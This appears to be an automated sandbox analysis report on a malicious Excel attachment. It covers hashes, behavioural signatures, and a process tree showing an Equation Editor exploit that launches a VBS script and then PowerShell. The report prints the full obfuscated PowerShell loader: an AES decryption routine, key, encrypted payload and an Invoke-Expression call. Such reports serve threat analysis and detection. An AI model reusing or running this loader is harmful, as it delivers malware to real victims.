Analysis
-
max time kernel
144s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
26/07/2024, 11:01
Static task
static1
Behavioral task
behavioral1
Sample
AWD 490104998518.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
AWD 490104998518.xls
Resource
win10v2004-20240709-en
General
-
Target
AWD 490104998518.xls
-
Size
1.2MB
-
MD5
f63c009bccbc4d8d26d162a168feaeb1
-
SHA1
fa8ab13582703932f968a31e6cc0973e45ca43e0
-
SHA256
f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3
-
SHA512
56a099036928c0af89d6a4cde7977cf5f3a5626a028aabea8a4dc590dd582c395042ae2c4f05b8085b81a9d19fb12f18beea0fe145712f057ffc12028e063395
-
SSDEEP
24576:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5Kj1G8RjM78quuH6OBrNoDgYEMuFh:9Hr9+FZQNw1Q1l5oGYjMhuu3BRo0Yr+
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 11 1708 EQNEDT32.EXE 12 1028 powershell.exe -
Abuses OpenXML format to download file from external location
-
pid Process 1028 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 1708 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1760 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1028 powershell.exe Token: SeShutdownPrivilege 2536 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1760 EXCEL.EXE 1760 EXCEL.EXE 1760 EXCEL.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1708 wrote to memory of 780 1708 EQNEDT32.EXE 33 PID 1708 wrote to memory of 780 1708 EQNEDT32.EXE 33 PID 1708 wrote to memory of 780 1708 EQNEDT32.EXE 33 PID 1708 wrote to memory of 780 1708 EQNEDT32.EXE 33 PID 780 wrote to memory of 1028 780 WScript.exe 34 PID 780 wrote to memory of 1028 780 WScript.exe 34 PID 780 wrote to memory of 1028 780 WScript.exe 34 PID 780 wrote to memory of 1028 780 WScript.exe 34 PID 2536 wrote to memory of 1784 2536 WINWORD.EXE 36 PID 2536 wrote to memory of 1784 2536 WINWORD.EXE 36 PID 2536 wrote to memory of 1784 2536 WINWORD.EXE 36 PID 2536 wrote to memory of 1784 2536 WINWORD.EXE 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\AWD 490104998518.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1760
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1784
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7BD7F3F9-6CF2-4A4A-BC63-46B9EAC2ED1D}.FSD
Filesize128KB
MD550c03fa16fdf5a8dc024333c4d6322f8
SHA1222367043a1b6afc0a895a6e56f6a63d598aac86
SHA2561b2f97568ba5a2edc394f7106fb2549f2db3f26334fe5a816f12b1c2915e0ae8
SHA5128edf05a191797c4be178334ee390794a52565bf9e923367f5bd6e7052e9fc34f2e48dd94913237661dc3b85b57fa67ca53bbe75e29a11a4388fa5045eb4e77ff
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize128KB
MD506affedb3acc140be7fa458b6485a664
SHA144394b6dc8abdf00f3ac4e38ea52c807b45a655b
SHA256454678244de989a1c49b4bfdbc4581c864364f81dedc3f97b39a0ef8c232b18a
SHA512697e584f399a1608daa92b41a761cbea345356d91b7119bb7726937b424747664df6802e86820d56fb66c6a83526a64b02e7ce58a596102a163af5bee6685b22
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DB1EAE14-EBAB-4E09-A703-847628820889}.FSD
Filesize128KB
MD51d480e311ca4db15b0d02303767869ba
SHA186a1d83bc1ae7513c54a8f73aa8127a6a414c004
SHA2560840c3e53855eb156e0f4c0d3d0923e78ce0da65409f974723cd413ec00a4868
SHA5123dcea1b828e006217439476780c09d7cd8c17d5820419ad3ba45df5b2e5c0714c03c9068d41723c8fa26979975bd71b6d596104653d150da8a73e25c9e578168
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc
Filesize83KB
MD5e03f3290788de4d7a103f16b780b3cce
SHA1c220e79a2714ed59f4d7b1d0a4f6c63a03772ea6
SHA256db4fed8fb3c35582ade2fa57a5866ec7795e94bff34f004f66d15233d1a2fcd8
SHA5129372b124ecb895a5c7672d75d17eb3ea3d91fab5ed675aa82090d8d00c15cb4477553342a356c4f8616869c2987105e6468bb2a912196dab055e06e34ad24b63
-
Filesize
128KB
MD575a65fd301e7502f04f4e1283667ec0f
SHA1880133e60c726ba309f61c970678da2fcefb7346
SHA2566722282816329e4c984c07ce9fc8ef5253c1b568121fe8f65fb4c21c1fa58301
SHA512ef8f8d6fca21f478629089b98661590e6f8960291385a24e511846cf232f54aadeccb6d28578bcd6129a85887b1fa02039386b620b696ccfbd47cc4f65fc7eaa
-
Filesize
20KB
MD5acf86365f0b275c45dde8e7b3b4310ff
SHA1fc440f05f848894b685ea253a3cac557274b94e7
SHA2569b71bb48753fc95d6afb442ed1376ce45662e84c06b2ebebb07938e209b017d5
SHA512b14fdf898bd95b4f42ae3657122340a958c16eae64b934e9641818174fdaa63110c26de9d6ce59d201d5b6e34a641c5e15aa94a750a99703af888651dc075859
-
Filesize
409KB
MD594734cb139b6b9025fd8a1acc56027db
SHA1b385368bcaadaca073849a413660b68e690ffba5
SHA2567dde4d5f845dbb2a078f6d0a290472d22cc845c6d6927cc0ada645ce050c7b08
SHA51258e0064f4b304b5503c4a7e689d96cc62bac4bc8ee76d39fede408b9e777b9602334dad4e1570fa0b9e0c363e7d8ee419a41d4da02493d174d61f96acca4053f